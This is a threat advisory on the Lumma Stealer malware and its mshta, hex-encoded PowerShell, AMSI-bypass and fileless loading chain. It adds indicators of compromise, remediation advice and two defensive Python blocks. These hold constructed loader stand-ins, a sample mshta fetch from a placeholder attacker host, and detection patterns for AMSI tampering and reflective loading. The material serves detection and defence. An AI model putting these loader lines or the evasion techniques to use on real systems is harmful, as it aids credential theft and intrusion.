

CISA Issues Alert on Active Exploitation of SonicWall Command Injection Vulnerability
April 17, 2025
Microsoft Alerts on Node.js Exploitation in Malware Campaigns
April 17, 2025
Severity
Medium
Analysis Summary
Lumma Stealer, an information-stealing malware sold under the Malware-as-a-Service (MaaS) model, has evolved significantly since it emerged in 2022. Attributed to Russian-speaking threat actors, it exfiltrates credentials, browser cookies, cryptocurrency wallet data and other personally identifiable information (PII) from Windows systems, and it has repeatedly adapted to evade conventional detection. Distribution relies largely on social engineering, chiefly phishing emails that redirect victims to fake CAPTCHA pages. These pages instruct the user to paste and run a command in the Windows Run dialog, which silently launches the first stage of the payload.
According to the published research, a newly observed infection vector abuses mshta.exe, a legitimate Windows utility, to fetch and execute a remote script disguised as an .mp4 file. This maps to MITRE ATT&CK T1218.005 (System Binary Proxy Execution: Mshta): a signed, trusted Windows binary runs attacker-supplied content, which lets the payload slip past application-control rules that do not cover mshta.exe and execute outside the browser's sandbox and security restrictions. The fake .mp4 contains obfuscated JavaScript and hexadecimal strings; once mshta.exe interprets it, a multi-stage infection sequence begins. This abuse of living-off-the-land binaries (LOLBins) keeps the activity inside processes that defenders tend to trust.
The malware's stealth rests on layered obfuscation. The JavaScript stage stores the hex-encoded second-stage PowerShell payload in a variable named "Fygo"; the script decodes the hex at runtime and hands the reconstructed PowerShell command to eval() for execution. The PowerShell stage then delivers a third stage that bypasses the Antimalware Scan Interface (AMSI): it locates the reference to the "AmsiScanBuffer" function in memory and overwrites it. AMSI itself lives in amsi.dll, but the .NET runtime (clr.dll) calls AmsiScanBuffer to scan assemblies loaded from memory, so breaking that reference means the in-memory .NET payload that follows is never submitted for scanning.
In the final stage a Base64-encoded .NET assembly is decoded and loaded directly into memory through reflection, so the payload never touches disk and leaves no file-based artifacts. This fileless execution sharply limits what signature-based antivirus and disk-centric endpoint tooling can see; detection has to come from script-block logging, AMSI telemetry and in-memory behaviour. The use of these capabilities suggests that the observed Lumma Stealer variant belongs to the more expensive "Professional" or "Corporate" tiers of the MaaS offering, illustrating the growing sophistication and commercialisation of commodity crimeware.
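The staging chain above (hex-encoded PowerShell inside a JavaScript variable, string-split "AmsiScanBuffer" reference, Base64 .NET assembly loaded by reflection) is the part an analyst has to peel back by hand. The triage helper below is an added example, not code from the original advisory or from the Lumma Stealer research it summarises. It builds a constructed fake .mp4 in the shape described (the variable name "Fygo" is from the advisory; the JavaScript wrapper, the PowerShell stand-in and the 64-byte MZ stub are assumptions), then decodes the hex stage and reports the behaviours the text lists.

```python
import base64
import re

# Constructed stand-ins for the stages described above. The MZ header makes the
# "assembly" recognisable as a PE image; it is four real header bytes plus padding.
MZ_B64 = base64.b64encode(b"MZ\x90\x00" + bytes(60)).decode()

SECOND_STAGE_PS = (
    "$m='Amsi'+'ScanBuffer';"                 # string splitting defeats a naive grep
    "Write-Host ('would patch ' + $m);"       # stand-in for the in-memory patch
    "$b=[Convert]::FromBase64String('" + MZ_B64 + "');"
    "[Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,@());"
)


def build_fake_mp4(ps_stage: str, var_name: str = "Fygo") -> str:
    """Wrap a PowerShell stage the way the advisory describes: hex-encoded in a
    JavaScript variable inside an HTA-style document served under an .mp4 name."""
    hexed = ps_stage.encode("utf-8").hex()
    return (
        "<html><head><script language=\"javascript\">\n"
        f"var {var_name} = \"{hexed}\";\n"
        f"var s = ''; for (var i = 0; i < {var_name}.length; i += 2) "
        f"{{ s += String.fromCharCode(parseInt({var_name}.substr(i, 2), 16)); }}\n"
        "eval(s); /* constructed stand-in: the real loader hands s to PowerShell */\n"
        "</script></head></html>"
    )


HEX_VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"([0-9a-fA-F]{40,})"')
B64_ARG_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", re.IGNORECASE)


def extract_hex_stage(hta_text: str):
    """Return (variable_name, decoded_text) for the first long hex literal, or None."""
    m = HEX_VAR_RE.search(hta_text)
    if m is None:
        return None
    name, hexed = m.groups()
    try:
        raw = bytes.fromhex(hexed)
    except ValueError:          # odd length or stray characters
        return None
    return name, raw.decode("utf-8", errors="replace")


def normalize_ps(ps: str) -> str:
    """Undo the simplest string-splitting trick ('Amsi'+'ScanBuffer') and lower-case."""
    return re.sub(r"""['"]\s*\+\s*['"]""", "", ps).lower()


def triage(hta_text: str) -> list:
    """Decode the embedded stage and report the behaviours the advisory lists."""
    findings = []
    stage = extract_hex_stage(hta_text)
    if stage is None:
        return findings
    name, ps = stage
    findings.append(f"hex-encoded stage in variable '{name}'")
    norm = normalize_ps(ps)
    if "amsiscanbuffer" in norm:
        findings.append("references AmsiScanBuffer (AMSI tampering)")
    if "reflection.assembly]::load(" in norm:
        findings.append("reflective .NET assembly load")
    for blob in B64_ARG_RE.findall(ps):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:      # binascii.Error is a ValueError subclass
            continue
        if raw[:2] == b"MZ":
            findings.append("embedded Base64 PE image (MZ header)")
    return findings


if __name__ == "__main__":
    for line in triage(build_fake_mp4(SECOND_STAGE_PS)):
        print("-", line)
```

The normalisation step matters more than the regexes: real samples vary the variable name and split or concatenate sensitive strings, so a hunt that greps the raw file for "AmsiScanBuffer" misses exactly the samples this advisory describes. Decode first, then match.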
Impact
- Sensitive Information Theft
- Crypto Theft
- Security Bypass
- Code Execution
- Gain Access
Indicators of Compromise
Domain Name
- klipderiq.shop
- check.qlkwr.com
- xian.klipderiq.shop
- simplerwebs.world
- affc.klipcewucyu.shop
- klipdiheqoe.shop
- heavens.holistic-haven.shop
IP
- 104.21.64.1 (this address sits in Cloudflare's 104.16.0.0/13 range and fronts many unrelated sites; use it as an investigation pivot rather than a block-list entry)
MD5
- cf11599333fed4ca46ce4ffa842a53bb
- c44b2e323b4164c50ca6a4f1d55c7504
- 6ea6215981cf69c355bc60c0061d52aa
- 8a08a5edc038f153574bea0d70203eef
- 30df5bd13b9666d14a13cdc7960803f5
- b775351f7a697d6deb1d440dc12d9761
SHA-256
- 02630fa994b1566ad1515fd87220fc037b967f07495985a3637d68d7e08c57ee
- 77f2a6a87fd5aca73be774e267907427277d863f335fea09ccfb4b693d5a0287
- b96542451f473e9f8231ae5a712c834c08c4cf90cd956201d72b953170c12de1
- 4ab874dc915b08dc3f59169ebd6cb3278f98cbfca4ebdaca69af07dd63279095
- 6a80253afc260c3966c662f519d3ce3da4ccfeaec1314083800c5097ec9cbd1f
- 4baabdbe96a16716454a62abd7a7105d8b3a775c2428a0052d9738b0412a32c6
SHA-1
- ef85ba125184cbb92b3abf780fa9dbf0a1f1d4d0
- ded3ed8724e5913d341b3eaca9bd9f47f0e4a4a2
- 8bb8f2324aa1aca4da6fbea5cdaad4f66263b545
- 60e30eaeedc7abb079fd7e6d2d8f486de5a9af38
- 88958d7c9749b7d085ee28d9fa50151a505eba09
- b133d42502750817aa8e88119ff36158d2f8ecee
Affected Vendors
- Microsoft
Remediation
- Block all listed threat indicators at your respective controls (mail gateway, web proxy, DNS, EDR).
- Search for the indicators of compromise (IOCs) above in your environment using your respective security controls.
- Block or tightly control mshta.exe, powershell.exe and other Living-off-the-Land Binaries (LOLBins) with Windows AppLocker or WDAC (Windows Defender Application Control); mshta.exe appears in Microsoft's recommended block rules and is rarely needed on user workstations.
- Implement advanced email filtering to detect and block phishing attempts, with URL scanning and sandboxing of links and attachments.
- Run regular security-awareness training covering fake CAPTCHA pages and any prompt to paste a command into the Windows Run dialog; no legitimate verification flow requires this.
- Deploy EDR (Endpoint Detection and Response) solutions that detect fileless malware behaviour and monitor script execution in memory, and enable PowerShell script-block logging so decoded stages are recorded.
- Keep an AMSI-integrated antimalware engine active (for example Microsoft Defender for Endpoint) and alert on scripts that attempt to patch or unhook AMSI functions such as AmsiScanBuffer.
- Monitor and restrict outbound connections to suspicious or unknown domains and IP addresses; use DNS filtering to block known malicious domains.
- Perform regular threat hunting for behaviour patterns such as mshta.exe contacting external URLs, mshta.exe requesting content that is not an .hta, or PowerShell spawned by mshta.exe or other unusual parent processes.
- Keep all operating systems and applications updated with the latest security patches to minimise exploitable vulnerabilities.
- Enforce strong, unique passwords with a password manager and consider privileged access management (PAM) for sensitive accounts; on any host where Lumma Stealer ran, rotate credentials and invalidate browser sessions, since stolen cookies bypass passwords entirely.
- Use DLP (Data Loss Prevention) tools to monitor and prevent unauthorized exfiltration of sensitive data from endpoints or servers.
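The hunting items above (mshta.exe calling external URLs, PowerShell spawned from unusual processes, in-memory loader behaviour) can be expressed as a few rules over process-creation telemetry. The block below is an added example, not detection content from the advisory or from any vendor product. It runs the rules over constructed events in the shape of Sysmon Event ID 1 (ProcessCreate) fields; the host names, paths and command lines in the events are invented, not the advisory's indicators.

```python
import re
from urllib.parse import urlsplit

# Constructed events in the shape of Sysmon Event ID 1 (ProcessCreate) fields.
# Host names and paths are invented; they are not the advisory's IOCs.
EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://cdn.malicious.example/clip.mp4'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -c \"$b=[Convert]::FromBase64String($x);"
                    "[Reflection.Assembly]::Load($b)\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
PS_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
LOLBIN_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line tokens typical of the second and third stages described above.
PS_TOKENS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-enc(?:odedcommand)?\b", re.I),
    "Base64 decode": re.compile(r"frombase64string", re.I),
    "reflective load": re.compile(r"reflection\.assembly\]?::load", re.I),
    "AMSI reference": re.compile(r"amsi\s*scan\s*buffer|amsiutils", re.I),
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_mshta_remote(ev):
    """mshta.exe given a URL; flag harder when the URL does not look like an .hta."""
    if basename(ev["Image"]) != "mshta.exe":
        return None
    urls = URL_RE.findall(ev["CommandLine"])
    if not urls:
        return None
    path = urlsplit(urls[0]).path
    last = path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    if ext and ext != "hta":
        return f"mshta fetching remote content disguised as .{ext}"
    return "mshta fetching remote content"


def rule_ps_from_lolbin(ev):
    """PowerShell whose parent is a script host or proxy-execution binary."""
    if basename(ev["Image"]) not in PS_IMAGES:
        return None
    parent = basename(ev["ParentImage"])
    return f"PowerShell spawned by {parent}" if parent in LOLBIN_PARENTS else None


def rule_ps_inmemory(ev):
    """PowerShell command line carrying in-memory loader or AMSI-tampering tokens."""
    if basename(ev["Image"]) not in PS_IMAGES:
        return None
    hits = [name for name, rx in PS_TOKENS.items() if rx.search(ev["CommandLine"])]
    return "PowerShell in-memory loader traits: " + ", ".join(hits) if hits else None


RULES = (rule_mshta_remote, rule_ps_from_lolbin, rule_ps_inmemory)


def hunt(events):
    """Return [(event_index, [findings...])] for every event that trips a rule."""
    results = []
    for i, ev in enumerate(events):
        findings = [r for r in (rule(ev) for rule in RULES) if r]
        if findings:
            results.append((i, findings))
    return results


if __name__ == "__main__":
    for idx, findings in hunt(EVENTS):
        print(idx, EVENTS[idx]["CommandLine"])
        for f in findings:
            print("   ", f)
```

The parent/child rule is the most durable of the three: attackers can rename variables and re-encode stages, but a PowerShell process whose parent is mshta.exe is almost never legitimate in an enterprise fleet. Tune the mshta URL rule against intranet .hta usage before alerting on it.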